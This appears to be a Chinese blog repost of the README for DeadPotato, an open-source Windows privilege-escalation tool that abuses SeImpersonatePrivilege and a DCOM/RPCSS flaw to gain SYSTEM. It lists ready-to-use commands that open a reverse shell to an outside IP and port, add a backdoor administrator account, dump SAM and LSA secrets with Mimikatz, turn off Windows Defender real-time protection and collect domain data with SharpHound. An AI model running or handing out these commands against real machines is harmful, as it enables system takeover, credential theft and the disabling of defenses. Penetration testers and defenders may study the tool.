DeadPotato
🚨 Hashdump 和 SharpHound 模块现已推出!🚨
❗ 严禁在未经授权的情况下使用此程序。DeadPotato 的作者对系统造成的任何损害不承担任何责任。请谨慎使用。❗
C:\Users\lypd0> GodPotato.exe
⠀⢀⣠⣤⣤⣄⡀⠀ _ _
⣴⣿⣿⣿⣿⣿⣿⣦ | \ _ _ _||_) _ _|_ _ _|_ _
⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_)
⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0
⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =-
⠈⠁⠀⠀⠀
_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_
(*) Example Usage(s):
-={ deadpotato.exe -MODULE [ARGUMENTS] }=-
-> deadpotato.exe -cmd "whoami"
-> deadpotato.exe -rev 192.168.10.30:9001
-> deadpotato.exe -exe paylod.exe
-> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
-> deadpotato.exe -shell
-> deadpotato.exe -mimi sam
-> deadpotato.exe -defender off
-> deadpotato.exe -sharphound
(*) Available Modules:
- cmd: Execute a command as NT AUTHORITY\SYSTEM.
- rev: Attempts to establish a reverse shell connection to the provided host
- exe: Execute a program with NT AUTHORITY\SYSTEM privileges (Does not support interactivity).
- newadmin: Create a new administrator user on the local system.
- shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
- mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
- defender: Either enables or disables Windows Defender's real-time protection.
- sharphound: Attempts to collect domain data for BloodHound.
❔ 快速入门 - 如何使用
SeImpersonatePrivilege
您的上下文中是否启用了权限?使用DeadPotato ,可以在本地系统上获得最大权限。
该工具将尝试通过滥用 DCOM 的 RPCSS 处理 OXID 的缺陷来启动在用户上下文中运行的提升进程 NT AUTHORITY\SYSTEM
,从而允许不受限制地访问机器以自由执行关键操作。
⚠️在以下情况下,-cmd
将使用模块。有许多模块可供使用,例如 -rev IP:PORT
用于生成提升的反向 shell、-newadmin usr:pass
用于创建新的本地管理员用户以保持持久性或 -mimi sam
用于转储 SAM 哈希的模块。
验证 SeImpersonatePrivilege 权限
为了使用 DeadPotato,必须在当前上下文中启用 SeImpersonatePrivilege 权限。为了验证这一点,whoami /priv
可以执行该命令。如果禁用该权限,则在当前上下文中无法利用该漏洞。
C:\Users\lypd0> whoami /priv
<...SNIP...>
SeImpersonatePrivilege Impersonate a client after authentication Enabled
<...SNIP...>
🐚 获取提升的反向 Shell
🏅 致谢
本项目“DeadPotato”是基于 BeichenDream 的杰作“GodPotato”源代码构建的工具。如果您喜欢这个项目,请务必也去支持原项目
BeichenDream、Benjamin DELPY gentilkiwi
、BloodHound 开发者。
温馨提示:本文最后更新于2024年8月8日 17:45,若内容或图片失效,请在下方留言或联系博主。